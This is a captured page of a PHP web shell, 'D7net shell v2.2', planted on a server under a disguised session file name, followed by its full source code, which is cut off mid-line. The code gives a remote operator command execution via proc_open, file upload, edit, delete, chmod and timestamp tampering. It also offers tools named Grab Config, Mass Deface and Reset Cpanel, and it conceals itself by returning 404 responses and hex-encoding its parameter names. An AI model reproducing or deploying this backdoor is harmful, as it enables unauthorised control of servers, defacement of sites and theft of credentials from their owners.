D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
proc
/
thread-self
/
root
/
proc
/
thread-self
/
root
/
tmp
/
Filename :
sess_7af6e3bc04bb68c934cb4f349e9cc4ef.php
back
Copy
<?php ?> <!DOCTYPE html> <html> <head> <title>1#@!#!123s</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="author" content="D7net"> <meta name="viewport" content="Kontol" /> <meta name="description" content="Error Page"> <meta property="og:description" content="Error Page"> <meta property="og:image" content="#"> <meta name="robots" content="noindex"> <meta name="googlebot" content="noindex"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"> <link href="https://fonts.googleapis.com/css2?family=Carrois+Gothic&display=swap" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=Bungee+Outline&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> </head> <body> <style> @import url("https://fonts.googleapis.com/css?family=Dosis"); @import url("https://fonts.googleapis.com/css?family=Carrois+Gothic"); @import url("https://fonts.googleapis.com/css?family=Bungee+Outline"); body { font-family: "Dosis", cursive; color: #fff; text-shadow:0px 0px 1px #757575; background-color: #212529; background-size: cover; background-attachment: fixed; background-repeat: no-repeat; background-size: 7%, 7%; background-position: right bottom, left bottom; } .directory-listing-table { margin: auto; background-color: #212529; padding: .7rem 1rem; max-width: 900px; width: 100%; box-shadow: 0 0 20px black; border: 1px solid #40BECC; } .header { margin: auto; background-color: #212529; padding: .7rem 1rem; max-width: 100%; width: 100%; box-shadow: 0 0 20px black; border-bottom: 1px solid #40BECC; } th { border-top: 1px solid #fff; border-bottom: 1px solid #fff; } tbody td { font-size: 13px; padding: 0.5rem; color: #fff; font-weight: 400; font-family: "Roboto", "Poppins", sans-serif; } tbody td a { text-decoration: none; color: #fff; } tbody td:not(:first-child) { text-align: center; } body::-webkit-scrollbar { width: 14px; } body::-webkit-scrollbar-track { background: #000; } body::-webkit-scrollbar-thumb { background-color: #212529; border: 3px solid #000; } input { margin-bottom: 4px; background: rgba(0,0,0,0.3); border: none; outline: none; padding: 5px; font-size: 15px; color: #fff; text-shadow: 1px 1px 1px rgba(0,0,0,0.3); border: 1px solid rgba(0,0,0,0.3); border-radius: 14px; box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2); -webkit-transition: box-shadow .5s ease; -moz-transition: box-shadow .5s ease; -o-transition: box-shadow .5s ease; -ms-transition: box-shadow .5s ease; transition: box-shadow .5s ease; } textarea { max-width: 100%; max-height: 100%; padding-left: 2px; resize: none; overflow: auto; color: #fff; text-shadow: 1px 1px 1px rgba(0,0,0,0.3); border: 1px solid rgba(0,0,0,0.3); border-radius: 4px; box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2); -webkit-transition: box-shadow .5s ease; -moz-transition: box-shadow .5s ease; -o-transition: box-shadow .5s ease; -ms-transition: box-shadow .5s ease; transition: box-shadow .5s ease; background: rgba(0,0,0,0.3); } .badge-action-edit:hover::after { content: "Edit" } .badge-action-rename:hover::after { content: "Rename" } .badge-action-chmod:hover::after { content: "Chmod" } .badge-action-delete:hover::after { content: "Delete" } .badge-action-download:hover::after { content: "Download" } .badge-action-unzip:hover::after { content: "UnZip" } .badge-action-tanggal:hover::after { content: "ChDate" } .badge-action-unzip:hover::after, .badge-action-download:hover::after, .badge-action-delete:hover::after, .badge-action-chmod:hover::after, .badge-action-rename:hover::after, .badge-action-tanggal:hover::after, .badge-action-edit:hover::after { padding: 5px; border-radius: 10px; margin-left: -40px; color: #40BECC; border: 2px solid #40BECC; background-color: #212529; } .badge-action-unzip:hover::after, .badge-action-download:hover::after, .badge-action-delete:hover::after, .badge-action-chmod:hover::after, .badge-action-rename:hover::after, .badge-action-tanggal:hover::after, .badge-action-edit:hover::after { width: 68px; text-align: center; margin-top: -53px; display: block; position: absolute; font-size: 14px; } textarea::-webkit-scrollbar { width: 12px; } textarea::-webkit-scrollbar-track { background: #000000; } textarea::-webkit-scrollbar-thumb { background-color: #212529; border: 3px solid black; } a { color: #fff; text-decoration: none; } a:hover { color: #999797; text-shadow:0px 0px 2 0px #ED360E; } input,select,textarea { border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } select:after { cursor: pointer; } .pencet { background-color: rgb(0 0 0 / 57%); color: #fff; border-color: blanchedalmond; } .crot { border-radius: 50%; padding: 15px; width: 100px; height: 100px; } .d7net-text { font-size: 19pt; font-family: "Carrois Gothic", cursive; color: #fff; text-align: center; background: linear-gradient(200deg, #000000 25%, #ffffff 50%, #ffffff 75%, #ffffff 100%); background-size: 200% auto; -webkit-background-clip: text; -webkit-text-fill-color: transparent; animation: animate 1.2s linear infinite; } @keyframes animate{ to { background-position: 200% center; } } body, a, button:link{cursor:url(http://4.bp.blogspot.com/-hAF7tPUnmEE/TwGR3lRH0EI/AAAAAAAAAs8/6pki22hc3NE/s1600/ass.png), default; } button:hover { cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png), wait; } a:hover { cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png), wait; } </style> </td> <script> function myFunction() { var copyText = document.getElementById("myInput"); copyText.select(); copyText.setSelectionRange(0, 99999); // For mobile devices navigator.clipboard.writeText(copyText.value); alert("Copied Successfully!!"); } </script> <?php error_reporting(0); set_time_limit(0); @clearstatcache(); @ini_set('error_log', null); @http_response_code(404); $web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://".$_SERVER['HTTP_HOST']; $disfunc = @ini_get("disable_functions"); if (empty($disfunc)) { $disf = "<font color='lime'>AMAN</font>"; } else { $disf = "<font color='red'>".$disfunc."</font>"; } function author() { echo "</div><table class='directory-listing-table'><td><center><font face='Carrois Gothic' size='3px'>2017 © D7net | D704T team</center></td></table><br>"; exit(); } function cekdir() { if (isset($_GET['path'])) { $serlok = $_GET['path']; } else { $serlok = getcwd(); } if (is_writable($serlok)) { return "<font color='lime'>Aman Coy</font>"; } else { return "<font color='red'>KONTOL!</font>"; } } function cekroot() { if (is_writable($_SERVER['DOCUMENT_ROOT'])) { return "<font color='lime'>Aman Coy</font>"; } else { return "<font color='red'>KONTOL!</font>"; } } function d7net_ex($file) { $pile = $file; $pch = pathinfo($pile, PATHINFO_FILENAME); return $pch; } function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $path = $dir.'/'.$item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } function net($hexnet) { for ($i = 0; $i < strlen($hexnet); $i++) { $d7net .= dechex(ord($hexnet[$i])); } return $d7net; } function owner($file) { if (function_exists("posix_getpwuid")) { $tod = @posix_getpwuid(fileowner($file)); return "<center>".$tod['name']."</center>"; } else { return "<center>".fileowner($file)."</center>"; } } function cekwrite($serlok) { $izin = substr(sprintf('%o', fileperms($serlok)), -4); if (is_writable($serlok)) { return "<font color=lime>".$izin."</font>"; } else { return "<font color=red>".$izin."</font>"; } } function cmd($gas, $serlok) { $crot = $gas; $pr = "proc_open"; if (function_exists($pr)) { $tod = @proc_open($crot, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok); echo "".stream_get_contents($crottz[1])."</textarea></center><br>"; } else { echo "<font color='orange'></font>"; } } function ekse($coman, $serlok) { $ler = "2>&1"; if (!preg_match("/".$ler."/i", $coman)) { $coman = $coman." ".$ler; } $komen = $coman; $pr = "proc_open"; if (function_exists($pr)) { $tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok); echo "<pre><textarea rows='25' style='color:lime;' readonly='' cols='120px'> ".htmlspecialchars(stream_get_contents($crottz[1]))."</textarea></pre><br>"; } else { echo "<font color='orange'>proc_open function is disabled!!</font>"; } } function ipserv() { if (empty($_SERVER['SERVER_ADDR'])) { return gethostbyname($_SERVER['SERVER_NAME']); if (empty(gethostbyname($_SERVER['SERVER_NAME']))) { return $_SERVER['SERVER_NAME']; } } else { return $_SERVER['SERVER_ADDR']; } } function cekfile($file) { return '<i class="fa fa-file-code-o" style="font-size:17px;color:#456DEB;"></i>'; } function filedate($file) { return date("F d Y g:i:s", filemtime($file)); } function fext($file) { $sub = "\163\x75" . "\142\x73" . "\x74\x72"; return $sub(strrchr($file,'.'),1); } function gazz($file) { $fbiasa = array("php","phtml","shtml","phar","php7","html","htm","inc","phps","txt","js","css","htaccess","bin","pl","py","sh","php58","PhP7","aspx","dll","ini"); $notf = array("jpeg","jpg","png","gif","ico","webp","mp3","m4A","flac","wav","wma","3gp","ogg","webm","mp4","exe"); $stl = "\x73\x74" . "\162\164" . "\157\154\x6f" . "\167\x65\162"; $ext=$stl(fext($file)); if ($file == 'error_log') { return " <button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'> <i class='fa fa-edit' style='color: #36F239'></i></button> <button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'> <i class='fa fa-pencil' style='color: #fff'></i></button> <button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmod'> <i class='fa fa-gear' style='color: #06D2D5'></i></button> <button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdate'> <i class='fa fa-calendar' style='color: #4542F9'></i></button> <button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'> <i class='fa fa-trash' style='color: #E53A3A'></i></button> <button type='submit' class='btn btn-outline-secondary badge-action-unzip' name='pilih' value='unzip'> <i class='fa fa-file-archive-o' style='color: #F1BE0F'></i></button>"; } elseif(in_array($ext,$fbiasa)) { return " <button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'> <i class='fa fa-edit' style='color:#7AFF41'></i></button> <button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'> <i class='fa fa-pencil'></i></button> <button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'> <i class='fa fa-gear'></i></button> <button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'> <i class='fa fa-calendar'></i></button> <button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'> <i class='fa fa-trash'></i></button>"; } elseif(in_array($ext,$notf)) { return " <button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'> <i class='fa fa-pencil'></i></button> <button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'> <i class='fa fa-gear'></i></button> <button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'> <i class='fa fa-calendar'></i></button> <button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'> <i class='fa fa-trash'></i></button>"; } elseif($ext == 'zip') { return " <button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'> <i class='fa fa-pencil'></i></button> <button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'> <i class='fa fa-gear'></i></button> <button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'> <i class='fa fa-calendar'></i></button> <button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'> <i class='fa fa-trash'></i></button> <button type='submit' class='btn btn-outline-warning badge-action-unzip' name='pilih' value='unzip'> <i class='fa fa-file-archive-o'></i></button>"; } else { return " <button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'> <i class='fa fa-edit' style='color:#7AFF41'></i></button> <button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'> <i class='fa fa-pencil'></i></button> <button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'> <i class='fa fa-gear'></i></button> <button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'> <i class='fa fa-calendar'></i></button> <button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'> <i class='fa fa-trash'></i></button>"; } } function unzip($file, $serlok) { if (!is_readable($file)) { red("<table class='directory-listing-table' style='color:orange;'><thead><td><font color='orange'>Cannot Unzip File / Unreadable File !</font></td></thead></table>"); die(); } elseif (strpos(file_get_contents($file), "\x50\x4b\x03\x04") === false) { echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> This isn't Zip File</center></font></td></table>"; die(); } $zip = new ZipArchive; $res = $zip -> open($file); if ($res == true) { $zip -> extractTo($serlok); $zip -> close(); echo "<table class='directory-listing-table' style='border-color:lime;'> <td>Unzip File Successfully => <font color='lime'>".basename($_POST['path'])."</font><br> Extract to : <font color='aqua'>".$file."</font></td></thead</table>"; } else { echo "<table class='directory-listing-table' style='border-color:red;'><td><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to Unzip File!!</font></td></table>"; } exit(); } foreach($_POST as $key => $value){ $_POST[$key] = stripslashes($value); } if(isset($_GET['path'])){ $serlok = $_GET['path']; $serlok2 = $_GET['path']; } else { $serlok = getcwd(); $serlok2 = getcwd(); } $serlok = str_replace('\\','/',$serlok); $serloks = explode('/',$serlok); $serlokbos = @scandir($serlok); echo '<table class="header"><td><center> <div style="font-family:Bungee Outline;font-size:24px;"><a href="'.$_SERVER['SCRIPT_NAME'].'"><i class="fa-brands fa-napster"></i> D7net</a></center></div></td><td>'; echo '<table align="center"><td> <div class="btn-group me-2" role="group" aria-label="First group"> <button type="button" onclick=location.href="'.$_SERVER['SCRIPT_NAME'].'" class="btn btn-outline-light"><font color="aqua"><i class="fa fa-home"></i> Home</font></button> <div class="btn-group me-2" role="group" aria-label="First group"> <button type="button" onclick=location.href="?path='.$serlok.'&'.net("cmd").'=opet" class="btn btn-outline-light"><i class="fa fa-terminal"></i> Console</button>'; echo '<button type="button" onclick=location.href="?path='.$serlok.'&'.net("upload").'=opet" class="btn btn-outline-light"><i class="fa fa-upload"></i> Upload</button> <button type="button" class="btn btn-outline-light"onclick=location.href="?path='.$serlok.'&'.net("info").'=opet"><i class="fa fa-info-circle"></i> information</button> <button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("buatfile").'=opet"><i class="fa-solid fa-file-circle-plus" style="color:#1F5ACF;"></i> Create File</button> <button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("buatfolder").'=opet" style="float: right;"><i class="fa-solid fa-folder-plus" style="color:#FAA625;"></i> Create Folder</button> <button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("about").'=opet" style="float: right;"><i class="fa fa-info"></i> About</button> <button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("tool").'=opet"><i class="fa fa-wrench" style="color:#A7DBDF;"></i> Tools</button> </td></tr></div> </div></div></td></table></table><br>'; echo '<table class="directory-listing-table"><td><i class="fa fa-folder" style="color:#F19013;"></i> <b>:</b> '; foreach($serloks as $id => $lok){ if($lok == '' && $id == 0){ echo '<a href="?path=/">/ </a></center>'; continue; } if($lok == '') continue; echo '<a href="?path='; for($i=0; $i<=$id; $i++){ echo $serloks[$i]; if($i != $id) echo "/"; } echo '">'.$lok.'</a> / '; } echo '</td></thead></table><br>'; if (isset($_REQUEST['logout'])) { session_start(); session_destroy(); echo '<script>window.location="'.$_SERVER['SCRIPT_NAME'].'";</script>'; } if (isset($_GET['viewfile'])) { $files = basename($_GET['viewfile']); echo "<table class='directory-listing-table'><td><center>Filename : <font color='orange'>$files</font>"; echo '<form method="POST" action="?pilihan&path='.$serlok.'">'; echo "<table width='20%' border='0' cellpadding='0' cellspacing='0' align='center'><td> <a href='?path=$serlok' class='btn btn-outline-light'><i class='fa fa-arrow-left'></i> back</a>"; echo gazz($file); echo "<button type='button' style='float:right;' class='btn btn-outline-light' onclick='myFunction()'><i class='fa fa-copy'></i> Copy</button></div><br><br>"; echo "<input type='hidden' name='type' value='file'> <input type='hidden' name='name' value='$files'> <input type='hidden' name='path' value='$serlok/$files'>"; echo "<textarea readonly='' cols=120 rows=30 id='myInput'>".htmlspecialchars(file_get_contents($_GET['viewfile']))."</textarea></td></table></table><br>"; exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { if (is_dir($_POST['path'])) { xrmdir($_POST['path']); if (file_exists($_POST['path'])) { echo '<table class="directory-listing-table" style="border-color:red;"><td><center><font color="red"><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to delete Directory</font></center></td></table>'; } else { echo '<table class="directory-listing-table" style="border-color:lime;"><td><center><font color="lime"><i class="fa fa-trash"></i> Folder removed</font></center></td></table>'; } } elseif (is_file($_POST['path'])) { @unlink($_POST['path']); if (file_exists($_POST['path'])) { echo "<table class='directory-listing-table' style='border-color:red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to Delete File</font></center></td></table>"; } else { echo "<table class='directory-listing-table' style='border-color:lime;'><td><center><i class='fa fa-trash'></i> File removed <font color='lime'>".basename($_POST['path'])."</font></center></td></table>"; } } exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { if (isset($_POST['gantin'])) { $namabaru = $_GET['path']."/".$_POST['newname']; if (@rename($_POST['path'], $namabaru) === true) { echo "<table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Change Name Success<center></td></table><br>"; if ($_POST['type'] == "file") { echo "<table class='directory-listing-table'><td><center>Filename : <font color='orange'>".basename($_POST['newname'])."</font><br><br>"; } else { echo "<table class='directory-listing-table'><td><center><center>Folder : <font color='orange'>".basename($_POST['newname'])."</font><br>"; } echo '<form method="post"> <div class="input-group mb-1" style="width:300px;"> <input name="newname" type="text" class="form-control" size="20" placeholder="New name" /> <input type="hidden" name="path" value="'.$_POST['newname'].'"> <input type="hidden" name="pilih" value="gantinama">'; if ($_POST['type'] == "file") { echo '<input type="hidden" name="type" value="file">'; } else { echo '<input type="hidden" name="type" value="dir">'; } echo '<input type="submit" value="Change" name="gantin" class="btn btn-outline-light mb-1"> </div></form></td></table>'; } else { echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> FAILED TO CHANGE NAME</font></center></td></table>"; } } else { if ($_POST['type'] == "file") { echo "<table class='directory-listing-table'><td><center>Filename <font color='orange'>: ".basename($_POST['path'], $_GET['file'])."</font><br><br>"; } else { echo "<table class='directory-listing-table'><td><center>Folder <font color='orange'>: ".basename($_POST['path'])."</font><br><br>"; } echo ' <form method="post"> <div class="input-group mb-1" style="width:300px;"> <input name="newname" type="text" class="form-control" size="20" placeholder="New name" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="pilih" value="gantinama">'; if ($_POST['type'] == "file") { echo '<input type="hidden" name="type" value="file">'; } else { echo '<input type="hidden" name="type" value="dir">'; } echo '<input type="submit" value="Change" name="gantin" class="btn btn-outline-light mb-1"/> </div></form></td></table><br>'; } exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { if (isset($_POST['gasedit'])) { $edit = file_put_contents($_POST['path'], $_POST['src']); if ($edit == true) { echo "<table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>File saved Successfully</font></center></td></table><br>"; } else { echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't save file/Permission Denied</font></center></td></table><br>"; } } echo "<center><table class='directory-listing-table'><td><center> Filename : <font color='orange'>".basename($_POST['path'])."</font><br><br>"; echo '<form method="post"> <div class="btn-group me-2" role="group" aria-label="First group"> <a href="?path='.$serlok.'" class="btn btn-outline-light"><i class="fa fa-arrow-left"></i> back</a> <button type="submit" name="gasedit" class="btn btn-outline-light"style="width:250px;"> <i class="fa fa-save"></i> Save</button> <button type="button" class="btn btn-outline-light" onclick="myFunction()"><i class="fa fa-copy"></i> Copy</button></div><br><br> <textarea type="text" cols=120 id="myInput" rows=30 name="src">'.htmlspecialchars(@file_get_contents($_POST['path'])).'</textarea><br> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="pilih" value="edit"> </form><br></td></thead></table><br>'; exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdatef") { $filedate = basename($_POST['path']); $tgl = date("F d Y g:i:s", filemtime($_POST['path'])); echo "<table class='directory-listing-table'><td> <form method='post'><center> <font color='#fff'>Ubah Tanggal<br>Folder :</font> <font color='orange'>$filedate</font> <br>$tgl<br><br><div class='input-group mb-3' style='width:280px;'> <input name='tanggal' type='text' class='form-control' value='".$_POST['tanggal']."' placeholder='$tgl'/> <input type='hidden' name='path' value='".$_POST['path']."'> <input type='hidden' name='pilih' value='chdatef'> <button type='submit' class='btn btn-outline-light mb-1' name='change' value='change'>Change</button></div></form></center></td></table>"; if (isset($_POST['change'])) { $tanggal = strtotime($_POST['tanggal']); if (@touch($_POST['path'], $tanggal) == true) { echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'><center>Changed Successfully!!</font></center></td></table>"; } else { echo "<br><table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change date!!</td></table>"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdate") { $filedate = basename($_POST['path']); $tgl = date("F d Y g:i:s", filemtime($_POST['path'])); echo "<table class='directory-listing-table'><td> <form method='post'><center><font color='#fff'>Ubah Tanggal<br>File :</font> <font color='orange'>$filedate <br></font>$tgl <br><br><div class='input-group mb-3' style='width:300px;'> <input name='tanggal' type='text' class='form-control' value='".$_POST['tanggal']."' placeholder='$tgl'/> <input type='hidden' name='path' value='".$_POST['path']."'> <input type='hidden' name='pilih' value='chdate'> <button type='submit' class='btn btn-outline-light mb-1' name='change' value='change'>Change</button> </div></form></center></td></table>"; if (isset($_POST['change'])) { $tanggal = strtotime($_POST['tanggal']); if (@touch($_POST['path'], $tanggal) == true) { echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'><center>Changed Successfully!!</font></center></td></table>"; } else { echo "<br><table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change date!!</td></table>"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmodf") { $files = basename($_POST['path']); $sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms'; echo "<table class='directory-listing-table'><td> <br><center> <font color='#fff'>Folder : <font color='orange'>$files</font> (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")<br><br> <form method='post'> <div class='input-group mb-3' style='width:230px;'> <input type='text' name='mod1' maxlength='4' class='form-control' height='10' value='".$_POST['mod1']."' placeholder='0755' required/> <input type='hidden' name='path' value='".$_POST['path']."'> <input type='hidden' name='pilih' value='chmodf'> <button type='submit' class='btn btn-outline-light mb-1' name='ganti' value='ganti'>Change</button> </div></form></td></table>"; if (isset($_POST['ganti'])) { $opet = @chmod($_POST['path'], octdec($_POST['mod1'])); if ($opet == true) { echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Changed Successfully!!</font></center></td></table>"; } else { echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change!!</font></center></td></table>"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmod") { $files = basename($_POST['path']); $sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms'; echo "<table class='directory-listing-table'><td> <center><font color='#fff'>Filename : <font color='orange'>$files</font> (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")<br><br> <form method='post'> <div class='input-group mb-3' style='width:230px;'> <input type='text' name='mod1' class='form-control' maxlength='4' height='10' value='".$_POST['mod1']."' placeholder='0644' required/> <input type='hidden' name='path' value='".$_POST['path']."'> <input type='hidden' name='pilih' value='chmod'> <br><br><button type='submit' class='btn btn-outline-light mb-1' name='ganti' value='ganti'>Change</button></div> </form></td></table>"; if (isset($_POST['ganti'])) { $opet = @chmod($_POST['path'], octdec($_POST['mod1'])); if ($opet == true) { echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Changed Successfully!!</font></center></td></table>"; } else { echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change!!</font></center></td></table>"; } }exit(); } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") { unzip($_POST['path'], $serlok); } elseif ($_REQUEST[net('upload')] == "opet") { echo "<table class='directory-listing-table'><td><center> <form method='POST' enctype='multipart/form-data' id='upload'><h5><i class='fa fa-upload'></i> UPLOAD FILES<h5> <div class='input-group' style='width:360px;'> <input type='file' name='d7netfile' id='d7net' style='background-color: grey;' class='form-control' name='uplod'> <input type='submit' class='btn btn-outline-light' for='inputGroupFile02' name='uplod' value='Upload'></div> </form></center></td></table>"; if (isset($_POST['uplod'])) { if ($_POST['dirnya'] == "2") { $serlok = $_SERVER['DOCUMENT_ROOT']; } if (empty($_FILES['d7netfile']['name'])) { echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> File not selected</center></font>"; } else { $data = @file_put_contents($serlok."/".$_FILES['d7netfile']['name'], @file_get_contents($_FILES['d7netfile']['tmp_name'])); if (file_exists($serlok."/".$_FILES['d7netfile']['name'])) { $fl = $serlok."/".$_FILES['d7netfile']['name']; echo "<br><table class='directory-listing-table' style='border-color:lime;'><td> Uploaded => <font color='lime'><i>".$_FILES['d7netfile']['name']."</i></font><br>"; if (strpos($serlok, $_SERVER['DOCUMENT_ROOT']) !== false) { $lwb = str_replace($_SERVER['DOCUMENT_ROOT'], $web."/", $fl); echo "Link : <a href='".$lwb."' target='_blank'><font color='lime'>Click here</font></a></td></table><br>"; } echo "<br>"; } else { echo "<br><table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center>There was an error uploading your file.</font></td></table>"; } } }exit(); } elseif ($_GET[net('tool')] == "opet") { echo '<table class="directory-listing-table"><thead><td><center><font color=orange>Select Tools</font><hr> <button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("grab_config").'=opet">Grab Config</button> <button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("hashiden").'=opet">Hash Identifier</button> <button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("ner").'=opet">Adminer</button> <button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("massdef").'=opet">Mass Deface</button> <button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("scanshell").'=opet">Shell Finder</button> <button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("lokfile").'=opet">Lock File</button> <button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("resetcp").'=opet">Reset Cpanel</button><hr> '; exit(); } elseif ($_GET[net('cmd')] == "opet") { echo "<table class='directory-listing-table'><td>"; echo '<br><form method="post"><center> <div class="input-group" style="width:600px;"> <span class="input-group-text mb-1">Command :</span> <input type="text" class="form-control" name="komen" id="comandnya" value="'.$_POST['komen'].'" placeholder="uname -a" required> <button type="submit" name="comandeks" value="execute" class="btn btn-outline-light mb-1">>></button></div></form><br><center>'; if (isset($_POST['comandeks'])) { ekse($_POST['komen'], $serlok); } echo "</center></td></table><br></center>"; exit(); } elseif ($_REQUEST[net('about')] == "opet") { echo "<table class='directory-listing-table'><thead><td><div style='font-family: Bungee Outline;font-size:24px;'> <img class='crot' src='https://i.pinimg.com/564x/84/0e/4c/840e4c57fab2ba6279b377ae8dc333d3.jpg'/> Priv shell uwu edition</div><hr> <br> - D7net shell v2.2 <br> - Created by D7net</td></thead></table>"; exit(); } elseif ($_REQUEST[net('lokfile')] == "opet") { echo "<table class='directory-listing-table'><td> <h5><i class='fa fa-lock' style='color:#1A9DD2;'></i> Lock file<font class='d7net-text' style='font-size:12px;'><i> Linux</i></font></h5><hr style='color:#04FBFF;'> <center><form method='post'> <div class='input-group' style='width:300px;'> <span class='input-group-text mb-2'>Filename :</span> <input type='text' name='pile' class='form-control mb-2' placeholder='file.php'/></div><br> <button type='sumbit' class='btn btn-outline-light' style='width:120px;' name='submit'>Submit</button> <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form><br></td></table>"; if (isset($_POST['submit'])) { if (empty($_POST['pile'])) { echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center>The File field is required</center></font></td></table>"; } else { $filez = $_POST['pile']; $tempe = "/tmp"; if (file_exists($tempe.'/'.md5($serlok. $filez.'-xd7net').d7net_ex($filez).'xhand.Lock') && file_exists($tempe . '/'.d7net_ex($filez).'-xopet')) { cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xopet').d7net_ex($filez).'xd7net.Lock', $serlok); cmd('rm -rf '.$tempe.'/'.md5($serlok. 